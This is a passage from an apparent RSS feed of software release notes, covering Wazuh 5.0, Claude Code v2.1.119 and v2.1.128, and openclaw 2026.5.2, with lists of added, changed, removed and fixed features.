<li>Removed deprecated manager daemons: <code>ossec-authd</code>, <code>wazuh-agentlessd</code>, <code>wazuh-maild</code>, <code>wazuh-dbd</code>. (<a href="https://github.com/wazuh/wazuh/issues/30922" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30922/hovercard">#30922</a>)</li>
<li>Removed deprecated C CLI tools: <code>manage_agents</code>, <code>agent-auth</code>. (<a href="https://github.com/wazuh/wazuh/issues/30924" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30924/hovercard">#30924</a>)</li>
<li>Removed OpenSCAP server-side module. (<a href="https://github.com/wazuh/wazuh/issues/31028" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31028/hovercard">#31028</a>)</li>
<li>Removed inventory-related API endpoints. (<a href="https://github.com/wazuh/wazuh/issues/31299" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31299/hovercard">#31299</a>)</li>
<li>Removed legacy API security configuration endpoints. (<a href="https://github.com/wazuh/wazuh/issues/28425" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/28425/hovercard">#28425</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Vulnerability Detector version matcher logic for improved detection accuracy. (<a href="https://github.com/wazuh/wazuh/issues/31746" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31746/hovercard">#31746</a>)</li>
<li>Fixed Cloudtrail log ingestion parsing errors. (<a href="https://github.com/wazuh/wazuh/issues/33108" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33108/hovercard">#33108</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Added</h3>
<ul>
<li>Added local state persistence for agent modules (FIM, System Inventory, SCA), removing the dependency on <code>rsync</code> with the Wazuh Server and reducing network traffic and server-side processing overhead. (<a href="https://github.com/wazuh/wazuh/issues/29533" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/29533/hovercard">#29533</a>) (<a href="https://github.com/wazuh/wazuh/issues/31838" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31838/hovercard">#31838</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed the Wazuh Manager installation path to <code>/var/wazuh-manager</code> (replacing <code>/var/ossec</code>) and removed agent ID <code>000</code>, fully decoupling agent and manager processes on shared hosts. (<a href="https://github.com/wazuh/wazuh/issues/33378" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33378/hovercard">#33378</a>)</li>
<li>Changed Vulnerability Detection to use the Wazuh Indexer as the sole authoritative CVE data source, removing direct CTI network access from the agent-side Vulnerability Detector. (<a href="https://github.com/wazuh/wazuh/issues/34849" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34849/hovercard">#34849</a>)</li>
<li>Adjusted agent-side Vulnerability Detector inventory emission and synchronization (OS, packages, hotfixes) to align with the updated VD behavior in Wazuh 5.0. (<a href="https://github.com/wazuh/wazuh/issues/33199" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33199/hovercard">#33199</a>)</li>
<li>Simplified rootcheck: removed the server-side database, sync path, and API surface; findings are now indexed through the standard alert pipeline. (<a href="https://github.com/wazuh/wazuh/issues/31478" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31478/hovercard">#31478</a>)</li>
<li>Updated logcollector file-tailing initial read strategy for more consistent behavior across log rotation scenarios. (<a href="https://github.com/wazuh/wazuh/issues/33382" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33382/hovercard">#33382</a>)</li>
<li>Updated Windows Event Channel log collection to emit native XML from <code>EvtRender()</code> without an XML declaration header. (<a href="https://github.com/wazuh/wazuh/issues/34462" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34462/hovercard">#34462</a>)</li>
<li>Increased default limits for agent event throughput and inventory message sizes. (<a href="https://github.com/wazuh/wazuh/issues/35330" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35330/hovercard">#35330</a>)</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed deprecated agent binaries and legacy modules as part of the Wazuh 5.0 agent cleanup. (<a href="https://github.com/wazuh/wazuh/issues/30435" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30435/hovercard">#30435</a>)</li>
<li>Removed NSIS-based Windows agent installer; Windows agent now ships exclusively as an MSI package. (<a href="https://github.com/wazuh/wazuh/issues/31582" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31582/hovercard">#31582</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed FIM checksum calculation that was incorrectly ignoring some file fields. (<a href="https://github.com/wazuh/wazuh/issues/29668" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/29668/hovercard">#29668</a>)</li>
<li>Fixed syscollector reporting duplicate and bogus packages on macOS arm64. (<a href="https://github.com/wazuh/wazuh/issues/30513" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30513/hovercard">#30513</a>)</li>
<li>Fixed <code>agent_control</code> not displaying agent status information. (<a href="https://github.com/wazuh/wazuh/issues/32915" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/32915/hovercard">#32915</a>)</li>
<li>Fixed SCA handling of invalid operators and missing values in regex patterns. (<a href="https://github.com/wazuh/wazuh/issues/35071" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35071/hovercard">#35071</a>)</li>
<li>Fixed agent modules initializing before agent metadata was fully ready. (<a href="https://github.com/wazuh/wazuh/issues/35156" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35156/hovercard">#35156</a>)</li>
<li>Fixed FIM inventory reporting file modification time as 1970-01-01. (<a href="https://github.com/wazuh/wazuh/issues/35162" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35162/hovercard">#35162</a>)</li>
<li>Fixed agent automatic reload failing after receiving centralized configuration. (<a href="https://github.com/wazuh/wazuh/issues/35169" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35169/hovercard">#35169</a>)</li>
<li>Fixed syscollector false positive package detection on macOS. (<a href="https://github.com/wazuh/wazuh/issues/35248" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35248/hovercard">#35248</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.119]]></title>
<description><![CDATA[What's changed

/config settings (theme, editor mode, verbose, etc.) now persist to ~/.claude/settings.json and participate in project/local/policy override precedence
Added prUrlTemplate setting to point the footer PR badge at a custom code-review URL instead of github.com
Added CLAUDE_CODE_HIDE...]]></description>
<link>https://tsecurity.de/de/3487671/downloads/v21119/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487671/downloads/v21119/</guid>
<pubDate>Tue, 05 May 2026 02:02:13 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li><code>/config</code> settings (theme, editor mode, verbose, etc.) now persist to <code>~/.claude/settings.json</code> and participate in project/local/policy override precedence</li>
<li>Added <code>prUrlTemplate</code> setting to point the footer PR badge at a custom code-review URL instead of github.com</li>
<li>Added <code>CLAUDE_CODE_HIDE_CWD</code> environment variable to hide the working directory in the startup logo</li>
<li><code>--from-pr</code> now accepts GitLab merge-request, Bitbucket pull-request, and GitHub Enterprise PR URLs</li>
<li><code>--print</code> mode now honors the agent's <code>tools:</code> and <code>disallowedTools:</code> frontmatter, matching interactive-mode behavior</li>
<li><code>--agent &lt;name&gt;</code> now honors the agent definition's <code>permissionMode</code> for built-in agents</li>
<li>PowerShell tool commands can now be auto-approved in permission mode, matching Bash behavior</li>
<li>Hooks: <code>PostToolUse</code> and <code>PostToolUseFailure</code> hook inputs now include <code>duration_ms</code> (tool execution time, excluding permission prompts and PreToolUse hooks)</li>
<li>Subagent and SDK MCP server reconfiguration now connects servers in parallel instead of serially</li>
<li>Plugins pinned by another plugin's version constraint now auto-update to the highest satisfying git tag</li>
<li>Vim mode: Esc in INSERT no longer pulls a queued message back into the input; press Esc again to interrupt</li>
<li>Slash command suggestions now highlight the characters that matched your query</li>
<li>Slash command picker now wraps long descriptions onto a second line instead of truncating</li>
<li><code>owner/repo#N</code> shorthand links in output now use your git remote's host instead of always pointing at github.com</li>
<li>Security: <code>blockedMarketplaces</code> now correctly enforces <code>hostPattern</code> and <code>pathPattern</code> entries</li>
<li>OpenTelemetry: <code>tool_result</code> and <code>tool_decision</code> events now include <code>tool_use_id</code>; <code>tool_result</code> also includes <code>tool_input_size_bytes</code></li>
<li>Status line: stdin JSON now includes <code>effort.level</code> and <code>thinking.enabled</code></li>
<li>Fixed pasting CRLF content (Windows clipboards, Xcode console) inserting an extra blank line between every line</li>
<li>Fixed multi-line paste losing newlines in terminals using kitty keyboard protocol sequences inside bracketed paste</li>
<li>Fixed Glob and Grep tools disappearing on native macOS/Linux builds when the Bash tool is denied via permissions</li>
<li>Fixed scrolling up in fullscreen mode snapping back to the bottom every time a tool finishes</li>
<li>Fixed MCP HTTP connections failing with "Invalid OAuth error response" when servers returned non-JSON bodies for OAuth discovery requests</li>
<li>Fixed Rewind overlay showing "(no prompt)" for messages with image attachments</li>
<li>Fixed auto mode overriding plan mode with conflicting "Execute immediately" instructions</li>
<li>Fixed async <code>PostToolUse</code> hooks that emit no response payload writing empty entries to the session transcript</li>
<li>Fixed spinner staying on when a subagent task notification is orphaned in the queue</li>
<li>Tool search is now disabled by default on Vertex AI to avoid an unsupported beta header error (opt in with <code>ENABLE_TOOL_SEARCH</code>)</li>
<li>Fixed <code>@</code>-file Tab completion replacing the entire prompt when used inside a slash command with an absolute path</li>
<li>Fixed a stray <code>p</code> character appearing at the prompt on startup in macOS Terminal.app via Docker or SSH</li>
<li>Fixed <code>${ENV_VAR}</code> placeholders in <code>headers</code> for HTTP/SSE/WebSocket MCP servers not being substituted before requests</li>
<li>Fixed MCP OAuth client secret stored via <code>--client-secret</code> not being sent during token exchange for servers requiring <code>client_secret_post</code></li>
<li>Fixed <code>/skills</code> Enter key closing the dialog instead of pre-filling <code>/&lt;skill-name&gt;</code> in the prompt</li>
<li>Fixed <code>/agents</code> detail view mislabeling built-in tools unavailable to subagents as "Unrecognized"</li>
<li>Fixed MCP servers from plugins not spawning on Windows when the plugin cache was incomplete</li>
<li>Fixed <code>/export</code> showing the current default model instead of the model the conversation actually used</li>
<li>Fixed verbose output setting not persisting after restart</li>
<li>Fixed <code>/usage</code> progress bars overlapping with their "Resets …" labels</li>
<li>Fixed plugin MCP servers failing when <code>${user_config.*}</code> references an optional field left blank</li>
<li>Fixed list items containing a sentence-final number wrapping the number onto its own line</li>
<li>Fixed <code>/plan</code> and <code>/plan open</code> not acting on the existing plan when entering plan mode</li>
<li>Fixed skills invoked before auto-compaction being re-executed against the next user message</li>
<li>Fixed <code>/reload-plugins</code> and <code>/doctor</code> reporting load errors for disabled plugins</li>
<li>Fixed Agent tool with <code>isolation: "worktree"</code> reusing stale worktrees from prior sessions</li>
<li>Fixed disabled MCP servers appearing as "failed" in <code>/status</code></li>
<li>Fixed <code>TaskList</code> returning tasks in arbitrary filesystem order instead of sorted by ID</li>
<li>Fixed spurious "GitHub API rate limit exceeded" hints when <code>gh</code> output contained PR titles mentioning "rate limit"</li>
<li>Fixed SDK/bridge <code>read_file</code> not correctly enforcing size cap on growing files</li>
<li>Fixed PR not linked to session when working in a git worktree</li>
<li>Fixed <code>/doctor</code> warning about MCP server entries overridden by a higher-precedence scope</li>
<li>Windows: removed false-positive "Windows requires 'cmd /c' wrapper" MCP config warning</li>
<li>[VSCode] Fixed voice dictation's first recording producing nothing on macOS while the microphone permission prompt is showing</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.128]]></title>
<description><![CDATA[What's changed

Bare /color (no args) now picks a random session color
/mcp now shows the tool count for connected servers and flags servers that connected with 0 tools
--plugin-dir now accepts .zip plugin archives in addition to directories
--channels now works with console (API key) authenticat...]]></description>
<link>https://tsecurity.de/de/3487643/downloads/v21128/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487643/downloads/v21128/</guid>
<pubDate>Tue, 05 May 2026 02:01:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Bare <code>/color</code> (no args) now picks a random session color</li>
<li><code>/mcp</code> now shows the tool count for connected servers and flags servers that connected with 0 tools</li>
<li><code>--plugin-dir</code> now accepts <code>.zip</code> plugin archives in addition to directories</li>
<li><code>--channels</code> now works with console (API key) authentication — console orgs with managed settings must set <code>channelsEnabled: true</code> to enable</li>
<li>Updated <code>/model</code> picker: collapsed duplicate Opus 4.7 entries, and current Opus now shows as "Opus" instead of "Opus 4.7"</li>
<li>Subprocesses (Bash, hooks, MCP, LSP) no longer inherit <code>OTEL_*</code> environment variables, so OTEL-instrumented apps run via the Bash tool no longer pick up the CLI's own OTLP endpoint</li>
<li>MCP: <code>workspace</code> is now a reserved server name — existing servers with that name will be skipped with a warning</li>
<li>Reconnecting MCP servers no longer flood the conversation with full tool-name lists on every reconnect — re-announced tools are summarized by server prefix</li>
<li>SDK hosts now receive a persistent <code>localSettings</code> suggestion for Bash permission prompts, so "Always allow" writes to <code>.claude/settings.local.json</code></li>
<li><code>EnterWorktree</code> now creates the new branch from local HEAD as documented, instead of <code>origin/&lt;default-branch&gt;</code> — unpushed commits are no longer dropped</li>
<li>Auto mode: when the classifier can't evaluate an action, the error now includes a hint (retry, <code>/compact</code>, or run with <code>--debug</code>)</li>
<li>Fixed focus mode briefly dimming the previous response when submitting a new prompt</li>
<li>Fixed stray "4;0;" desktop notification on every <code>/exit</code> in Kitty and other terminals that interpret OSC 9 as a notification</li>
<li>Fixed Remote Control showing an empty "Opening your options…" message on rate limit instead of actionable upsell options</li>
<li>Fixed drag-and-drop image upload hanging on "Pasting text…" when the image read fails</li>
<li>Fixed crash loop when piping very large input (&gt;10 MB) to <code>claude -p</code> via stdin</li>
<li>Fixed long URLs not being individually clickable on every wrapped row in fullscreen mode</li>
<li>Fixed <code>/plugin</code> Components panel showing "Marketplace 'inline' not found" for plugins loaded via <code>--plugin-dir</code></li>
<li>Fixed MCP tool results dropping images when the server returns both structured content and content blocks</li>
<li>Fixed fenced code blocks inside list items carrying leading whitespace into the clipboard on copy-paste</li>
<li>Fixed tab navigation in <code>/config</code> stranding focus — the tab header now stays focused so arrows and Esc keep working</li>
<li>Fixed markdown link labels being lost on terminals without OSC 8 hyperlink support — links now render as <code>label (url)</code> instead of just the URL</li>
<li>Fixed sessions on 1M-context models with a smaller autocompact window being falsely blocked with "Prompt is too long" before reaching the actual API limit</li>
<li>Fixed parallel shell tool calls: a failing read-only command (grep, git diff, ls) no longer cancels sibling calls</li>
<li>Fixed banner showing "with X effort" on models that don't support effort</li>
<li>Fixed <code>/fast</code> on 3P providers fuzzy-matching to an unrelated skill instead of showing "not available"</li>
<li>Fixed Bedrock default model resolving to <code>global.*</code> instead of the region-appropriate prefix</li>
<li>Fixed vim mode: <code>Space</code> in NORMAL mode now moves the cursor right, matching standard vi/vim behavior</li>
<li>Fixed terminal progress indicator (OSC 9;4) flickering off between tool calls — stays visible across the full turn</li>
<li>Fixed <code>/rename</code> without args failing on resumed sessions whose last entry is a compact boundary</li>
<li>Fixed stale "remote-control is active" status lines from prior sessions appearing after <code>--resume</code>/<code>--continue</code></li>
<li>Fixed stale <code>installed_plugins.json</code> entries pointing at deleted cache directories polluting PATH</li>
<li>Fixed MCP stdio servers receiving corrupted arguments when <code>CLAUDE_CODE_SHELL_PREFIX</code> is set and an argument contains spaces or shell metacharacters</li>
<li>Fixed sub-agent progress summaries missing the prompt cache (~3× <code>cache_creation</code> reduction)</li>
<li>Fixed <code>/plugin update</code> never detecting new versions of npm-sourced plugins</li>
<li>Fixed sub-agent summaries firing repeatedly while a sub-agent's transcript is static, capping worst-case token cost on idle sub-agents</li>
<li>Headless <code>--output-format stream-json</code>: <code>init.plugin_errors</code> now includes <code>--plugin-dir</code> load failures in addition to dependency demotions</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.
Gateway and agent hot paths are leaner ...]]></description>
<link>https://tsecurity.de/de/3482973/downloads/openclaw-202652/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482973/downloads/openclaw-202652/</guid>
<pubDate>Sun, 03 May 2026 01:46:19 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.</li>
<li>Control UI and WebChat are more resilient across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Messaging fixes cover WhatsApp Channel/Newsletter targets, Telegram topic commands and networking, Discord delivery/startup edge cases, Slack threads, Signal groups/media, and visible reply routing.</li>
<li>Provider and media fixes cover OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, LM Studio reasoning metadata, Brave/SearXNG/Firecrawl web search, media paths, music, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Gateway/startup and restart: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable; add <code>openclaw gateway restart --force</code> and <code>--wait &lt;duration&gt;</code>, log active task run IDs before restart deferral timers, and report timeout restarts as explicit forced restarts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</li>
<li>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</li>
<li>Plugins/update: on the beta OpenClaw update channel, default-line npm and ClawHub plugin updates try <code>@beta</code> first and fall back to default/latest when no plugin beta release exists.</li>
<li>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</li>
<li>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params, and memoize transcript replay-policy resolution for stable config and process-env runs while preserving model-specific transport hook patches and custom-env provider behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</li>
<li>Tools/plugins: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references, and cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/beta: externalize ACPX behind <code>@openclaw/acpx</code> and diagnostics OpenTelemetry behind <code>@openclaw/diagnostics-otel</code>, keeping their heavier runtime stacks out of the core package until installed; prepare Google Chat, LINE, Matrix, Mattermost, BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, Zalo Personal, diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, WhatsApp, Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code>/<code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</li>
<li>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, add <code>googlemeet end-active-conference</code> for closing managed spaces after a call, and add <code>googlemeet test-listen</code> plus the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Plugins/ClawHub/onboarding: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verify ClawPack response headers and downloaded bytes, persist ClawPack digest/artifact metadata on install/update records and install-on-demand provider setup entries, and allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs and retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</li>
<li>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</li>
<li>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</li>
<li>Channels/WhatsApp: support explicit WhatsApp Channel/Newsletter <code>@newsletter</code> outbound message targets with channel session metadata instead of DM routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921599881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13417/hovercard" href="https://github.com/openclaw/openclaw/issues/13417">#13417</a>; carries forward the narrow outbound target idea from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921655588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/13424/hovercard" href="https://github.com/openclaw/openclaw/pull/13424">#13424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agentz-manfred/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agentz-manfred">@agentz-manfred</a>.</li>
<li>Dependencies: refresh workspace, bundled runtime, and plugin dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, Marked 18.0.3, Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</li>
